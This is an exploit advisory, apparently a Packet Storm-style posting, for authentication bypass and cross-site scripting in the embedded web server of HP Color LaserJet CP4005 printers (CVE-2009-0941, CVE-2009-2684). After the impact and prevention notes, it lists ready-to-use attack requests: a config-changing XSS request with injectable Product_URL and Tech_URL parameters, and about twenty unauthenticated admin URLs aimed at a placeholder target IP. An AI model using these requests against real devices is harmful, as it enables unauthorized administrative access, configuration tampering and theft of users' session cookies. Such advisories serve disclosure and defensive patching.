HP Color LaserJet CP4005 Printers 6.7.0.x Auth Bypass XSS

1. ############################################################################################
2.  
3. # Exploit Title : HP Color LaserJet CP4005 Printers 6.7.0.x Authentication Bypass - Cross Site Scripting
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 04/04/2019
7. # Vendor Homepage : hp.com
8. # Software Information Link : support.hp.com/gb-en/drivers/selfservice/hp-color-laserjet-cp4005-printer-series/2512208
9. # Software Version :
10. Driver-Universal Print Driver for Managed Services => 6.7.0.23989
11. Driver-Universal Print Driver => 6.1.0.20062 - 6.7.0.23989
12. Firmware : 46.230.6
13. Driver USB : 7.0.0.29
14. Software Universal Printer Driver : 1.8.6
15. # Tested On : Windows and Linux
16. # Category : Hardware
17. # Exploit Risk : High / Medium
18. # Common Vulnerability Enumeration :
19. CVE-2009-0941
20. CVE-2009-2684
21. # Vulnerability Type :
22. CWE-306 [ Missing Authentication for Critical Function ]
23. CWE-592 [ Authentication Bypass ]
24. CWE-287 [ Improper Authentication ]
25. CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
26. CWE-264 [ Permissions, Privileges, and Access Controls ]
27. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
28. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
29. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
30.  
31. ############################################################################################
32.  
33. # Description about Software :
34. ***************************
35. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
36.  
37. computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
38.  
39. ############################################################################################
40.  
41. # Impact :
42. ***********
43. Authentication Bypass / Missing Authentication For Critical Function :
44. ************************************************************
45. When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
46.  
47. Remote attackers can edit - delete and access files and administrative access without real administrator permission.
48.  
49. Remote attackers can bypass this because the system doesn't ask admin username and password.
50.  
51. The software does not perform any authentication for functionality that requires a provable user identity
52.  
53. or consumes a significant amount of resources.
54.  
55. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
56.  
57. affected application and change configuration settings or gain administrative access.
58.  
59. Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
60.  
61. Developing a fix would require understanding of the current application security model and implemented access controls.
62.  
63. Three basic rules however can help you eliminate potential improper authorization issues:
64.  
65. 1) Identify all privileged assets within your application (web pages that display sensitive data,
66. website sections that contain privileged/administrative functionality, etc.)
67.  
68. 2) Identify user roles within the application and their access permissions
69.  
70. 3) Always check if the user should have privileges to access the asset.
71.  
72. XSS Cross Site Scripting Impact /Prevention :
73. ****************************************
74. HP Color LaserJet CP4005 Printers are prone to a cross-site scripting vulnerability
75. because it fails to sufficiently sanitize user-supplied data.
76.  
77. A remote user can access the target user's cookies (including authentication cookies),
78. if any, associated with the HP Printer interface, access data recently submitted by the
79. target user via web form to the site, or take actions on the site acting as the target user.
80.  
81. Cross-site scripting vulnerability in HP Jetdirect and the Embedded Web Server (EWS)
82. on certain HP LaserJet and Color LaserJet printers allow remote attackers to
83. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter in an
84. Apply action to the support_param.html/config script.
85.  
86. Prevention of XSS Vulnerability :
87. ****************************
88. set the administrator password
89. use a new browser instance for administrator tasks
90. do not access other web sites while performing administrator tasks
91. exit the browser when administrator tasks are complete
92.  
93. According to the CVE-2009-0941 =>
94. *********************************
95. The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders
96. has no management password by default, which makes it easier for remote attackers to obtain access.
97.  
98. According to the CVE-2009-2684 =>
99. *********************************
100. Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on
101. certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to
102. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter
103. in an Apply action to the support_param.html/config script.
104.  
105. ############################################################################################
106.  
107. XSS Cross Site Scripting Exploit :
108. *******************************
109. https://[targetipaddress]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply
110.  
111. It returns as " /success_result.htm/config "
112.  
113. Configuration Successfully Done.
114.  
115. # Authentication Bypass Exploit / Vulnerability :
116. *******************************************
117. https://[targetipaddress]/hp/device/this.LCDispatcher
118.  
119. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.EmailServer
120.  
121. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
122.  
123. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
124.  
125. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts
126.  
127. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.AutoSend
128.  
129. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
130.  
131. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.OtherLinks
132.  
133. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Config
134.  
135. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
136.  
137. https://[targetipaddress]/hp/device/Auth/set_config_deviceinfo.htm
138.  
139. https://[targetipaddress]/hp/device/info_configuration.htm
140.  
141. https://[targetipaddress]/hp/jetdirect
142.  
143. https://[targetipaddress]/config_pro.htm
144. https://[targetipaddress]/tcpipv6.htm
145. https://[targetipaddress]/tcpipv4.htm
146.  
147. https://[targetipaddress]/tcp_param.htm
148. https://[targetipaddress]/network_id.htm
149.  
150. https://[targetipaddress]/tcp_summary.htm
151. https://[targetipaddress]/index_info.htm
152.  
153. https://[targetipaddress]/support_param.html
154. https://[targetipaddress]/support.htm
155.  
156. https://[targetipaddress]/tcp_diag.htm
157. https://[targetipaddress]/configpage.htm
158.  
159. https://[targetipaddress]/tcp_param.htm
160. https://[targetipaddress]/network_id.htm
161.  
162. ############################################################################################
163.  
164. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
165.  
166. ############################################################################################